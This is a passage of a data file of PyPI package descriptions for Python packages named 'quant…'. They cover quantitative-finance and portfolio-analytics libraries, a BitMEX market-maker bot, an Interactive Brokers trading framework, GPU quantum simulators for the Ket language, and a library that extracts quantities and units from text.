all cache like so:qs.clear_cache()Pandas cache is handled by thedata-cachelibrary.DocumentationThe documentation for each endpoints can be found here:https://api.quantsight.dev/docsLicenseThis project is licensed under the MIT License. See theGNU GENERAL PUBLIC LICENSEfile for details."} +{"package": "quantSim", "pacakge-description": "No description available on PyPI."} +{"package": "quants-net", "pacakge-description": "quants-net-pyPython package of quants-net"} +{"package": "quantspace", "pacakge-description": "quantspaceis a Python library designed specifically for quantitative finance, with a primary focus on supporting research and education in the field.Risk ManagementPortfolio OptimizationAnomaly DetectionFeatures1.Quantitative Research Toolsquantspaceoffers a comprehensive set of tools for conducting quantitative research in finance. From statistical analysis to advanced modeling techniques, the library provides the building blocks for developing and testing sophisticated financial strategies.2.Educational ResourcesDesigned with education in mind,quantspaceincludes resources and examples to help users understand and apply quantitative finance concepts. The library serves as a valuable resource for students, providing hands-on experience with real-world financial data and models.3.Data Integrationquantspaceseamlessly integrates with popular financial data sources, allowing users to access and analyze real-time and historical market data. This feature enhances the library's capabilities for both research and educational purposes.4.Flexibility and CustomizationThe library is designed to be flexible and customizable, accommodating a wide range of financial modeling requirements. Whether you are developing algorithms for risk management, portfolio optimization, or derivative pricing,quantspaceprovides a robust foundation for implementation.Getting StartedTo get started withquantspace, follow these simple steps:Installation:pip install quantspaceGetting Started:Risk measure:fromquantspace.riskimportsummary_riskreturns=[0.065,0.0265,-0.0593,-0.001,0.0346]summary_risk(returns=returns,risk_free_rate=0.05)Portfolio optimization:fromquantspace.utils.datasetsimportrandom_portfoliofromquantspace.portfolioimportMarkowitzFrontierimportnumpyasnpnp.random.seed(1234)n_assets=5# number of assets in portfolion_obs=1000# number of observations in datareturn_vec=np.random.randn(n_assets,n_obs)# generate random returns for each assetn_portfolios=500# number of portfolios to simulatemeans,stds=np.column_stack([random_portfolio(return_vec)for_inrange(n_portfolios)])# instantiate MarkowitzFrontier classm_frontier=MarkowitzFrontier(return_vec,stds,means)# plot efficient frontierm_frontier.plot_frontier()ContributionsWe welcome contributions from the community to enhance and expandquantspace. If you have ideas for new features, improvements, or find any issues, please feel free to contribute by submitting a pull request or opening an issue on our GitHub repository.Support and CommunityFor support or to connect with other users and contributors, join our community forums. We encourage discussions, knowledge sharing, and collaboration within thequantspacecommunity.Licensequantspaceis released under theMIT License, making it open and accessible for a wide range of users.Disclaimerquantspaceis provided \"as is\" without any warranty, express or implied. Use it at your own risk, and carefully review and test any code before deploying it in a production environment.Happy quantifying withquantspace!"} +{"package": "quantstack", "pacakge-description": "UNKNOWN"} +{"package": "quantstats-lumi", "pacakge-description": "Fork of Original QuantStats by Ran AroussiThis is a forked version of the original QuantStats library by Ran Aroussi. The original library can be found athttps://github.com/ranaroussi/quantstatsThis forked version was created because it seems that the original library is no longer being maintained. The original library has a number of issues and pull requests that have been open for a long time and have not been addressed. This forked version aims to address some of these issues and pull requests.This forked version is created and maintained by the Lumiwealth team. We are a team of data scientists and software engineers who are passionate about quantitative finance and algorithmic trading. We use QuantStats in our daily work with the Lumibot library and we want to make sure that QuantStats is a reliable and well-maintained library.If you\u2019re interested in learning how to make your own trading algorithms, check out our Lumibot library athttps://github.com/Lumiwealth/lumibotand check out our courses athttps://lumiwealth.comQuantStats: Portfolio analytics for quantsQuantStatsPython library that performs portfolio profiling, allowing quants and portfolio managers to understand their performance better by providing them with in-depth analytics and risk metrics.Changelog \u00bbQuantStats is comprised of 3 main modules:quantstats.stats- for calculating various performance metrics, like Sharpe ratio, Win rate, Volatility, etc.quantstats.plots- for visualizing performance, drawdowns, rolling statistics, monthly returns, etc.quantstats.reports- for generating metrics reports, batch plotting, and creating tear sheets that can be saved as an HTML file.Here\u2019s an example of a simple tear sheet analyzing a strategy:Quick StartInstall QuantStats Lumi using pip:$pipinstallquantstats-lumi%matplotlibinlineimportquantstats_lumiasqs# extend pandas functionality with metrics, etc.qs.extend_pandas()# fetch the daily returns for a stockstock=qs.utils.download_returns('META')# show sharpe ratioqs.stats.sharpe(stock)# or using extend_pandas() :)stock.sharpe()Output:0.8135304438803402Visualize stock performanceqs.plots.snapshot(stock,title='Facebook Performance',show=True)# can also be called via:# stock.plot_snapshot(title='Facebook Performance', show=True)Output:Creating a reportYou can create 7 different report tearsheets:qs.reports.metrics(mode='basic|full\",...)- shows basic/full metricsqs.reports.plots(mode='basic|full\",...)- shows basic/full plotsqs.reports.basic(...)- shows basic metrics and plotsqs.reports.full(...)- shows full metrics and plotsqs.reports.html(...)- generates a complete report as htmlLet\u2019 create an html tearsheet(benchmarkcanbeapandasSeriesorticker)qs.reports.html(stock,\"SPY\")Output will generate something like this:(view original html file)To view a complete list of available methods, run[fforfindir(qs.stats)iff[0]!='_']['avg_loss',\n 'avg_return',\n 'avg_win',\n 'best',\n 'cagr',\n 'calmar',\n 'common_sense_ratio',\n 'comp',\n 'compare',\n 'compsum',\n 'conditional_value_at_risk',\n 'consecutive_losses',\n 'consecutive_wins',\n 'cpc_index',\n 'cvar',\n 'drawdown_details',\n 'expected_return',\n 'expected_shortfall',\n 'exposure',\n 'gain_to_pain_ratio',\n 'geometric_mean',\n 'ghpr',\n 'greeks',\n 'implied_volatility',\n 'information_ratio',\n 'kelly_criterion',\n 'kurtosis',\n 'max_drawdown',\n 'monthly_returns',\n 'outlier_loss_ratio',\n 'outlier_win_ratio',\n 'outliers',\n 'payoff_ratio',\n 'profit_factor',\n 'profit_ratio',\n 'r2',\n 'r_squared',\n 'rar',\n 'recovery_factor',\n 'remove_outliers',\n 'risk_of_ruin',\n 'risk_return_ratio',\n 'rolling_greeks',\n 'ror',\n 'sharpe',\n 'skew',\n 'sortino',\n 'adjusted_sortino',\n 'tail_ratio',\n 'to_drawdown_series',\n 'ulcer_index',\n 'ulcer_performance_index',\n 'upi',\n 'utils',\n 'value_at_risk',\n 'var',\n 'volatility',\n 'win_loss_ratio',\n 'win_rate',\n 'worst'][fforfindir(qs.plots)iff[0]!='_']['daily_returns',\n 'distribution',\n 'drawdown',\n 'drawdowns_periods',\n 'earnings',\n 'histogram',\n 'log_returns',\n 'monthly_heatmap',\n 'returns',\n 'rolling_beta',\n 'rolling_sharpe',\n 'rolling_sortino',\n 'rolling_volatility',\n 'snapshot',\n 'yearly_returns']*** Full documenttion coming soon ***In the meantime, you can get insights as to optional parameters for each method, by using Python\u2019shelpmethod:help(qs.stats.conditional_value_at_risk)Help on function conditional_value_at_risk in module quantstats.stats:\n\nconditional_value_at_risk(returns, sigma=1, confidence=0.99)\n calculats the conditional daily value-at-risk (aka expected shortfall)\n quantifies the amount of tail risk an investmentInstallationInstall usingpip:$pipinstallquantstats--upgrade--no-cache-dirInstall usingconda:$condainstall-cranaroussiquantstatsRequirementsPython>= 3.5+pandas(tested to work with >=0.24.0)numpy>= 1.15.0scipy>= 1.2.0matplotlib>= 3.0.0seaborn>= 0.9.0tabulate>= 0.8.0yfinance>= 0.1.38plotly>= 3.4.1 (optional, for usingplots.to_plotly())Questions?This is a new library\u2026 If you find a bug, pleaseopen an issuein this repository.If you\u2019d like to contribute, a great place to look is theissues marked with help-wanted.Known IssuesFor some reason, I couldn\u2019t find a way to tell seaborn not to return the\nmonthly returns heatmap when instructed to save - so even if you save the plot (by passingsavefig={...}) it will still show the plot.Legal StuffQuantStatsis distributed under theApache Software License. See theLICENSE.txtfile in the release for details.P.S.Please drop me a note with any feedback you have.Ran Aroussi"} +{"package": "quantstyles", "pacakge-description": "QuantstylesA set of slightly customized colormaps and styles, developed for internal use by Quantum Technology research group in the University of Rostock.It includes the set of colormaps + custom matplotlib style.UsageImport the package in your scriptimport quantstylesPackage automatically exports all the colormaps, i.e. they could be normally used by their names, e.g.plt.show(data, cmap=\"quantjet\")Custom matplotlib style will be registered during first import of the package. It can be then activated asplt.style.use(\"quant\")InstallationThe package is published on pypi, so it is enough to run:pip install quantstylesManual installation# clone the repogitclonehttps://github.com/Trel725/quantstyles.git--recursive# build the wheelmake# manually install the built packagepipinstalldist/quantstyles-*-py3-none-any.whlAcknoledgementsThis project depends onBeautiful package for generating perceptually uniform colormapsby Peter Kovesi. The heart of this small project is just a small modification of original Julia code.get-cpt script that allows efficient export of generated colormaps to Python.DevelopmentIf you'd like to manually go through all the steps:Clone the repo bygit clone https://github.com/Trel725/quantstyles.git --recursiveRecursive is needed to sync get-cpt repo.Generate colormaps by executing Julia code in colormaps foldercd colormaps\njulia colormaps.jlPerceptualColourMaps.jl and PyPlot.jl need to be installed. See that code for more details, or just use pre-generated colormaps in the colormaps directory.3. Generate Python representation of the colormaps by runningpython generate_quantcmaps.py. This will produce actual file containing colormaps, quantcmaps.py The command requires numpy, os, glob and (probably) urllib (from get-cpt).\n4. Import quantcmaps in your script. All the listed colormaps will be available as usual, e.g.plt.imshow(data, cmap=\"quantjet\")5. Custom style need to be copied to the matplotlib config dir. Seeofficial manualsfor details.6. Additionally you can try to build pip wheel by executingmakein the project top directory.0.01Initial release, includesColormaps generationPackaging0.100Piblished on PyPI0.101-0.103Bug fixes0.104Added custom MPL style and its installer0.105Switched to sans-serif fonts according to Nature recommendationsCorrected font size for the same reason0.106-0.107Bug fixes"} +{"package": "quant-survey", "pacakge-description": "No description available on PyPI."} +{"package": "quanttide-data", "pacakge-description": "quanttide-data-python\u91cf\u6f6e\u6570\u636e\u5de5\u7a0bPython\u7248\u5b89\u88c5\u901a\u8fc7pip\u5b89\u88c5pipinstallquanttide-data\u901a\u8fc7poetry\u5b89\u88c5poetryaddquanttide-data\u6d4b\u8bd5poetryinstall"} +{"package": "quanttide-devops", "pacakge-description": "quanttide-devops-pythonPython SDK for Specification of QuantTide DevOpsInstallationpipinstallquanttide-devopsUsageqtdevopsreposync"} +{"package": "quanttools", "pacakge-description": "QuantTools Fundamental package for Quantitative Finance in Python."} +{"package": "quant-trade-framework", "pacakge-description": "GeneralQuantTradeClient\u901a\u7528\u91cf\u5316\u4ea4\u6613\u6846\u67b6\u5ba2\u6237\u7aef\uff0c\u7528\u6237\u83b7\u53d6\u5e73\u53f0\u6570\u636e#20191129\u521b\u5efa\u521d\u59cb\u7248\u672c#20191130\u589e\u52a0bar\u6570\u636e\u83b7\u53d6\u63a5\u53e3\n(1)\u521d\u59cb\u5316\u6570\u636e\u5e93\u8fde\u63a5\u914d\u7f6e,\u4ee5\u4e0b\u662f\u6807\u51c6\u914d\u7f6e\uff0c\u76f4\u63a5\u4f7f\u7528\u6e90\u4ee3\u7801\uff0c\u914d\u7f6e\u6587\u4ef6\u5728conf\u76ee\u5f55\u4e0b\ndatabase_manager = initialize.init(setting.SETTINGS)\n(2) database_manager.load_bar_data \u83b7\u53d6bar\u6570\u636e\u63a5\u53e3\uff0c\u5305\u542b\u4e94\u4e2a\u53c2\u6570\nsymbol: str \u5408\u7ea6\u540d\u79f0\uff0c\u6bd4\u5982\"M9999.XDCE\"\nexchange: str,\u4ea4\u6613\u6240\uff0c\u9ed8\u8ba4\u4f7f\u7528\"test\"\"\ninterval: str,bar\u6570\u636e\u805a\u5408\u65f6\u95f4\uff0c\u76ee\u524d\u53ea\u6709\"1m\"\nstart: datetime, \u67e5\u8be2\u5f00\u59cb\u65f6\u95f4\uff0c\u65f6\u95f4\u683c\u5f0f\u7b26\u5408\"2019-11-07 09:00:00\"\u8fd9\u79cd\u683c\u5f0f\nend: datetime, \u67e5\u8be2\u7ed3\u675f\u65f6\u95f4\uff0c\u65f6\u95f4\u683c\u5f0f\u7b26\u5408\"2019-11-07 09:00:00\"\u8fd9\u79cd\u683c\u5f0f\n\u6570\u636e\u63a5\u53e3\u8fd4\u56depanda.dataframe\u5bf9\u8c610.1.2\n\u5bf9\u7a0b\u5e8f\u4ee3\u7801\u8fdb\u884c\u5b8c\u5584\uff0c\u589e\u52a0\u4ee3\u7801\u6ce8\u91ca\nsphinx\u4f7f\u7528\u65b9\u6cd5\uff1a\n(1) python\u6e90\u4ee3\u7801\u81ea\u52a8\u751f\u6210rst,\u4f7f\u7528\u547d\u4ee4\uff1a\nsphinx-apidoc.exe -o rst ..sphinx-apidoc -o [\u751f\u6210rst\u7684\u4f4d\u7f6e] [\u9879\u76ee\u4ee3\u7801\u7684\u4f4d\u7f6e] -f(\u5f3a\u5236\u91cd\u65b0\u8986\u76d6\u5199\uff0c\u5426\u5219\u4f1a\u68c0\u6d4b\uff0c\u5982\u679c\u6709\u540c\u540d\u6587\u4ef6\u5b58\u5728\uff0c\u4f1a\u8df3\u8fc7\u4e0d\u66f4\u65b0)\nsphinx-apidoc -o rst ../src"} +{"package": "quanttrader", "pacakge-description": "quanttraderWelcome to quanttrader, a pure python-based event-driven backtest and live trading package for quant traders.The source code is completely open-sourcedhere on GitHub. The package is publishedhere on pypiand is ready to be pip installed. The document is hostedhere on readthedocs.In most cases, a backtest strategy can be directly used for live trade by simply switching to live brokerage. A control window is provided to monitor live trading sessions for each strategy separately and the portfolio as a whole.BacktestBacktest code structureBacktests examplesLive tradingLive Trading demo videoLive Trading code structurePrerequisite: download and install IB TWS or IB Gateway; enable API connection as describedhere.InstallationStep 1pipinstallquanttraderAlternatively, download or git the source code and include unzipped path in PYTHONPATH environment variable.step 2Downloadlive_engine.py,config_live.yaml,order_per_interval_strategy.pyby clicking Raw button, right clicking save as, and then change the file extension to .py or .yaml.step 3cdwhere_the_files_are_saved\npythonlive_engine.pyInstruments Supported and ExampleStock: AMZN STK SMARTForeign Exchange: EURGBP CASH IDEALPROFutures: ESM9 FUT GLOBEXOptions on Stock: AAPL OPT 20201016 128.75 C SMARTOptions on Futures: ES FOP 20200911 3450 C 50 GLOBEXComdty: XAUUSD CMDTY SMARTOrder Type SupportedBasic order types. SeeIB Docfor details.AuctionAuction LimitMarketMarket If TouchedMarket On CloseMarket On OpenMarket to LimitLimit OrderLimit if TouchedLimit on CloseLimit on OpenStopStop LimitTrailing StopTrailing Stop LimitDISCLAIMEROpen source, free to use, free to contribute, use at own risk. No promise of future profits nor responsibility of future loses."} +{"package": "quant-trading-api", "pacakge-description": "Python library for connecting to the Quant-trading.Network API."} +{"package": "quant-trading-bitmex-market-maker", "pacakge-description": "Quant-trading.network BitMEX Market MakerThis is a fully working sample market making bot for use withBitMEX.It is free to use and modify for your own development.Test onTestnetfirst!Testnet trading is completely free and is identical to the live market.Getting StartedCreate aQuant-trading.network Accountand checkout an algorihtm subscription.Create aTestnet BitMEX Accountanddeposit some TBTC.Install:pip install quant-trading-bitmex-market-maker. It is strongly recommeded to use a virtualenv.Create a marketmaker project: runmarketmaker setupThis will createsettings.pyandmarket_maker/in the working directory.Modifysettings.pyto configure the parameters.Edit settings.py to add yourBitMEX API Key and Secretand yourQuant-trading.network API Key, chose the quant-trading algorigthm to use and change bot parameters to fit your risk profile.Note that user/password authentication is not supported.Run it:marketmakerSatisfied with your bot's performance? Create alive API Keyfor your BitMEX account,clear the bot internal stateand then set theBASE_URLand start trading!Configure your bot (settings.py)A brief explanation of parameters that you will have to configure before using this bot. You can find these parameters in the settings filesettings.py.BASE_URL- The URL of the BitMEX exchange api (either the testnet one or the live market).BITMEX_API_KEY- The BitMEX API key associated with your account (make sure that this key will have the right permissions to place trading orders).BITMEX_API_SECRET- The BitMEX API key secret associated with your account.QUANT_API_KEY- The quant-trading.network API key associated with your account.QUANT_ALGO- The quant-trading.network algorithm you want to use (make sure that you have an active subscription for the chosen algorithm).TRADING_BALANCE_SIZE- The maximum trading position size in terms of percentage of your BitMEX account margin balance. The bigger the trading position the bigger will the rewards be, but also the risk of getting your BitMEX account liquidated. Therefore we have capped this parameter with reasonable limits for safety. This setting has the following limitsMin=10% & Max=100%.WarningPlease make sure to not use the associated BitMEX account other than by this bot. When you start trading with this bot make sure that you do not have any open position on BitMEX, otherwise, this may lead to unpredictable consequences including your BitMEX account liquidation!!!Clearing the bot internal stateThis is an action that you will have to take every time when you need to change some of the bot parameters as well as one of thetroubleshooting measure. When you execute this bot it will create two important filesopen_longs.py&open_shorts.pywhere it will save its internal state periodically so that it can recover its state after a restart. Therefore if you have to change certain bot parameters such asBASE_URL,QUANT_ALGOandTRADING_BALANCE_SIZE, this change will invalidate the current state saved in these files and hence you will have to execute the actions below:Close the market maker bot.Make sure that you close any open position that may have in your BitMEX account before starting the market maker bot.If the filesopen_longs.py&open_shorts.pyexist in the bot working directory delete them.If you need to change your bot configuration go over the filesettings.pyand make the necessary changes.Now you can start up the bot and make sure that it startscorrectly.Operation OverviewThis market maker works on the following principles:The market maker bot during its execution will create two important filesopen_longs.py&open_shorts.pywhere it will save its internal state periodically so that it can recover its state after a restart.The market maker tracks the lastbidPriceandaskPriceof the quoted instrument to determine where to start quoting.Based on quant-trading algorithm parameters, the bot creates a descriptions of orders it would like to place.This will be done when the bot gets the quant-trading algorithm real-time decision for the given current position in BitMEX.That personalized decision will either wait or it will increase\\decrease the current long or short position.\nBy repeating this process the quant-trading algorithm will totally manage your current position in BitMEX over time without any human intervention.These order descriptors are compared with what the bot has currently placed in the market.If an existing order can be amended to the desired value, it is amended.Otherwise, a new order is created.Extra orders are canceled.The bot then prints details of contracts traded, current balance, and current position size in percentage of the balance and in contracts amount.Simplified OutputThe following is some of what you can expect when running this bot:2020-07-10 08:41:49,680 - INFO - market_maker_runner - BitMEX Quant-trading.Network Market Maker Version: v1.0\n\n2020-07-10 08:41:51,253 - INFO - ws_thread - Connecting to wss://testnet.bitmex.com/realtime?subscribe=quote:XBTUSD,trade:XBTUSD,instrument,order:XBTUSD,execution:XBTUSD,margin,position\n2020-07-10 08:41:51,254 - INFO - ws_thread - Authenticating with API Key.\n2020-07-10 08:41:51,255 - INFO - ws_thread - Started thread\n2020-07-10 08:41:52,255 - INFO - ws_thread - Connected to WS. Waiting for data images, this may take a moment...\n2020-07-10 08:41:53,066 - INFO - ws_thread - Got all market data. Starting.\n2020-07-10 08:41:53,066 - INFO - market_maker - Using symbol XBTUSD.\n2020-07-10 08:41:53,066 - INFO - market_maker - Order Manager initializing, connecting to BitMEX. Live run: executing real trades.\n2020-07-10 08:41:53,067 - INFO - market_maker - Resetting current position. Canceling all existing orders.\n2020-07-10 08:41:53,067 - INFO - bitmex - sending req to https://testnet.bitmex.com/api/v1/order: {\"filter\": \"{\\\"ordStatus.isTerminated\\\": false, \\\"symbol\\\": \\\"XBTUSD\\\"}\", \"count\": 500}\n2020-07-10 08:41:54,323 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962841\n2020-07-10 08:41:54,323 - INFO - quant_base_strategy - print_status - Current Contract Position: 0\n2020-07-10 08:41:54,323 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 0.00\n2020-07-10 08:41:54,324 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 0\n2020-07-10 08:42:02,592 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962841\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - print_status - Current Contract Position: 0\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 0.00\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 0\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - handle_new_decision - new decision OPEN_LONG.\n2020-07-10 08:42:02,594 - INFO - market_maker - Creating 1 orders:\n2020-07-10 08:42:02,594 - INFO - market_maker - Buy 882 @ 9163.0\n2020-07-10 08:42:02,594 - INFO - bitmex - sending req to https://testnet.bitmex.com/api/v1/order/bulk: {\"orders\": [{\"price\": 9163.0, \"orderQty\": 882, \"side\": \"Buy\", \"clOrdID\": \"mm_bitmex_*REDACTED*\", \"symbol\": \"XBTUSD\", \"execInst\": \"ParticipateDoNotInitiate\"}]}\n2020-07-10 08:43:52,048 - INFO - ws_thread - Execution: Buy 725 Contracts of XBTUSD at 9163.0\n2020-07-10 08:44:02,583 - INFO - ws_thread - Execution: Buy 157 Contracts of XBTUSD at 9163.0\n2020-07-10 08:44:02,713 - INFO - quant_base_strategy - check_new_trade - We have a completed trade. Order details: {'orderID': '*REDACTED*', 'clOrdID': 'mm_bitmex_*REDACTED*', 'clOrdLinkID': '', 'account': 119731, 'symbol': 'XBTUSD', 'side': 'Buy', 'simpleOrderQty': None, 'orderQty': 882, 'price': 9163, 'displayQty': None, 'stopPx': None, 'pegOffsetValue': None, 'pegPriceType': '', 'currency': 'USD', 'settlCurrency': 'XBt', 'ordType': 'Limit', 'timeInForce': 'GoodTillCancel', 'execInst': 'ParticipateDoNotInitiate', 'contingencyType': '', 'exDestination': 'XBME', 'ordStatus': 'Filled', 'triggered': '', 'workingIndicator': False, 'ordRejReason': '', 'simpleLeavesQty': None, 'leavesQty': 0, 'simpleCumQty': None, 'cumQty': 882, 'avgPx': 9163.5, 'multiLegReportingType': 'SingleSecurity', 'text': 'Submitted via API.', 'transactTime': '2020-07-10T07:42:02.660Z', 'timestamp': '2020-07-10T07:44:02.524Z'}\n2020-07-10 08:58:46,989 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962433\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Current Contract Position: 882\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Avg Cost Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Avg Entry Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 10.00\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 882\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - handle_new_decision - new decision NONE.TroubleshootingThis bot during its execution life cycle it will try to keep its internal representation of the current position and the real current position in sync. This is really important so keep an eye on this. Because the algorithms' decisions are based on this internal representation. So during the bot execution, it will periodically print its status just like below:2020-07-10 08:58:46,989 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962433\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Current Contract Position: 882\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Avg Cost Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Avg Entry Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 10.00\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 882Current Contract Positionshould have the exact same value asCurrent Internal Contract Position. If this is not the case then you will have to close the bot, close your current position in your BitMEX account, and thenclear the bot internal state.Common errors we've seen:TypeError: __init__() got an unexpected keyword argument 'json'This is caused by an outdated version ofrequests. Runpip install -U requeststo update.CompatibilityThis module supports Python 3.5 and later.See alsoQuant-trading.network has a PythonREST clientAuthorsupport@quant-trading.network"} +{"package": "quanttus_api", "pacakge-description": "UNKNOWN"} +{"package": "quantuaninvest-download", "pacakge-description": "No description available on PyPI."} +{"package": "quantuiti", "pacakge-description": "quantuitiquantuiti is a platform designed to make automated trading easier.(Read the docs)"} +{"package": "quantuloop-aws-client", "pacakge-description": "Quantuloop AWS ClientClient to access your quantum simulator server on AWS. For more information, visithttps://simulator.quantuloop.com."} +{"package": "quantuloop-quest", "pacakge-description": "QuEST interface for the Ket Quantum Programming LanguageThis package provides the Quantuloop interface for QuEST, a open-source GPU accelerated quantum simulator, as a quantum execution target for the quantum programming language Ket. For more information on Ket, please visithttps://quantumket.org.Please note that the use of this simulator is exclusively for Quantuloop's customers and partners. To obtain your access token, please contact your institution or visithttps://quantuloop.com.CompatibilityThe following system requirements are necessary to run the Quantuloop QuEST simulator:CUDA 11.2 or newer with compatible NVIDIA driverNVIDIA GPU with CUDA architecture >= 3.5Linux X86_64 with glibc >= 2.17Ubuntu 18.04 or newer.Red Hat Enterprise Linux 7 or newer.Python 3.7 or newerKet 0.5.xUsageTo use Quantuloop QuEST, importquantuloop_questand set it as the quantum target execution:fromketimport*fromquantuloop_questquantuloop_quest.set_simulator(token='YOUR,ACCESS.TOKEN',)By installing or using this package, you agree to the Quantuloop Quantum Simulator Suite EULA.All rights reserved (C) 2023 Quantuloop"} +{"package": "quantuloop-simulator", "pacakge-description": "Quantuloop Quantum Simulator Suite for HPCTheQuantuloop Quantum Simulator Suite for HPCis a collection of high-performance quantum computer simulators for theKet language. Since quantum algorithms explore distinct aspects of quantum computation to extract advantages, there is no silver bullet for the simulation of a quantum computer. The Quantuloop Quantum Simulator Suite for HPC offers three quantum simulators today, with new ones coming in the future. The simulators available today are:Quantuloop Sparse, which brings the Bitwise Representation (implemented in the KBW Sparse) for HPC. This is the only simulator that implements this simulation algorithm and it provides many benefits:Ready for multi-GPU systems, allowing you to scale up simulations as needed.Efficient execution time with the amount of superposition, providing faster simulations.Exact simulation of more than 100 qubitsdepending on the algorithm, making it ideal for larger simulations.Quantuloop Denseis a state vector simulator built with the NVIDIA cuQuantum SDK cuStateVec. It provides several advantages:Great scalability in multi-GPU systems, enabling large simulations to be run with ease.The perfect fit for most quantum algorithms, allowing you to simulate many different types of quantum circuits.By using the Quantuloop Quantum Simulator Suite for HPC, you can enjoy the following benefits:Faster simulation times, as the simulators are optimized for GPU-based computing.Higher scalability, as multi-GPU systems, can be used to run large simulations.Access to unique simulation algorithms, such as the Parallel Bitwise implemented in the Quantuloop Sparse simulator.Ability to simulate a wide range of quantum algorithms and circuits, allowing you to explore the potential of quantum computing.The use of this simulator is exclusively for Quantuloop's customers and partners. Contact your institution to get your access token or visithttps://quantuloop.com.InstallationInstalling using pip:pipinstall--index-urlhttps://gitlab.com/api/v4/projects/43029789/packages/pypi/simplequantuloop-simulatorAdd in poetry:poetrysourceaddquantuloophttps://gitlab.com/api/v4/projects/43029789/packages/pypi/simple--secondary\npoetryaddquantuloop-simulatorUsageimportquantuloop_simulatorasqlimportketql.set_token(token=\"YOR.ACCESS.TOKEN\",# Quantuloop Access Token is required to use the simulators)process=ket.Process(ql.get_simulator(num_qubits=182,simulator=\"sparse\",# or \"dense\"precision=2,# optional, default 1gpu_count=4,# optional, default use all GPUs))CompatibilityThe following system requirements are necessary to run the Quantuloop Dense simulator:CUDA 12 or newer with compatible NVIDIA driverLinux x86_64 with glibc 2.18 or newerUbuntu 20.04 or newer.Red Hat Enterprise Linux 8 or newer.Python 3.8 or newerKet 0.7 or newerQuantuloop Dense is compatible only with CUDA architecture 70, 75, 80, and 86.By installing or using this package, you agree to the Quantuloop Quantum Simulator Suite EULA.All rights reserved (C) 2023 Quantuloop"} +{"package": "quantuloop-sparse", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantulum", "pacakge-description": "quantulumPython library for information extraction of quantities, measurements and their units from unstructured text.DemoTry ithere.InstallationFirst, installsklearn. Quantulum would still work without it, but it wouldn\u2019t be able to disambiguate between units with the same name (e.g.poundas currency or as unit of mass).Then,$pipinstallquantulumUsage>>>fromquantulumimportparser>>>quants=parser.parse('I want 2 liters of wine')>>>quants[Quantity(2,'litre')]TheQuantityclass stores the surface of the original text it was extracted from, as well as the (start, end) positions of the match:>>>quants[0].surfaceu'2 liters'>>>quants[0].span(7,15)An inline parser that embeds the parsed quantities in the text is also available (especially useful for debugging):>>>printparser.inline_parse('I want 2 liters of wine')Iwant2liters{Quantity(2,\"litre\")}ofwineUnits and entitiesAll units (e.g.litre) and the entities they are associated to (e.g.volume) are reconciled against WikiPedia:>>>quants[0].unitUnit(name=\"litre\",entity=Entity(\"volume\"),uri=https://en.wikipedia.org/wiki/Litre)>>>quants[0].unit.entityEntity(name=\"volume\",uri=https://en.wikipedia.org/wiki/Volume)This library includes more than 290 units and 75 entities. It also parses spelled-out numbers, ranges and uncertainties:>>>parser.parse('I want a gallon of beer')[Quantity(1,'gallon')]>>>parser.parse('The LHC smashes proton beams at 12.8\u201313.0 TeV')[Quantity(12.8,\"teraelectronvolt\"),Quantity(13,\"teraelectronvolt\")]>>>quant=parser.parse('The LHC smashes proton beams at 12.9\u00b10.1 TeV')>>>quant[0].uncertainty0.1Non-standard units usually don\u2019t have a WikiPedia page. The parser will still try to guess their underlying entity based on their dimensionality:>>>parser.parse('Sound travels at 0.34 km/s')[0].unitUnit(name=\"kilometre per second\",entity=Entity(\"speed\"),uri=None)DisambiguationIf the parser detects an ambiguity, a classifier based on the WikiPedia pages of the ambiguous units or entities tries to guess the right one:>>>parser.parse('I spent 20 pounds on this!')[Quantity(20,\"pound sterling\")]>>>parser.parse('It weighs no more than 20 pounds')[Quantity(20,\"pound-mass\")]or:>>>text='The average density of the Earth is about 5.5x10-3 kg/cm\u00b3'>>>parser.parse(text)[0].unit.entityEntity(name=\"density\",uri=https://en.wikipedia.org/wiki/Density)>>>text='The amount of O\u2082 is 2.98e-4 kg per liter of atmosphere'>>>parser.parse(text)[0].unit.entityEntity(name=\"concentration\",uri=https://en.wikipedia.org/wiki/Concentration)ManipulationWhile quantities cannot be manipulated within this library, there are many great options out there:pintnatuquantitiesExtensionSeeunits.jsonfor the complete list of units andentities.jsonfor the complete list of entities. The criteria for adding units have been:the unit has (or is redirected to) a WikiPedia pagethe unit is in common use (e.g. not thepremetric Swedish units of measurement).It\u2019s easy to extend these two files to the units/entities of interest. Here is an example of an entry inentities.json:{\"name\":\"speed\",\"dimensions\":[{\"base\":\"length\",\"power\":1},{\"base\":\"time\",\"power\":-1}],\"URI\":\"https://en.wikipedia.org/wiki/Speed\"}nameandURIare self explanatory.dimensionsis the dimensionality, a list of dictionaries each having abase(the name of another entity) and apower(an integer, can be negative).Here is an example of an entry inunits.json:{\"name\":\"metre per second\",\"surfaces\":[\"metre per second\",\"meter per second\"],\"entity\":\"speed\",\"URI\":\"https://en.wikipedia.org/wiki/Metre_per_second\",\"dimensions\":[{\"base\":\"metre\",\"power\":1},{\"base\":\"second\",\"power\":-1}],\"symbols\":[\"mps\"]}nameandURIare self explanatory.surfacesis a list of strings that refer to that unit. The library takes care of plurals, no need to specify 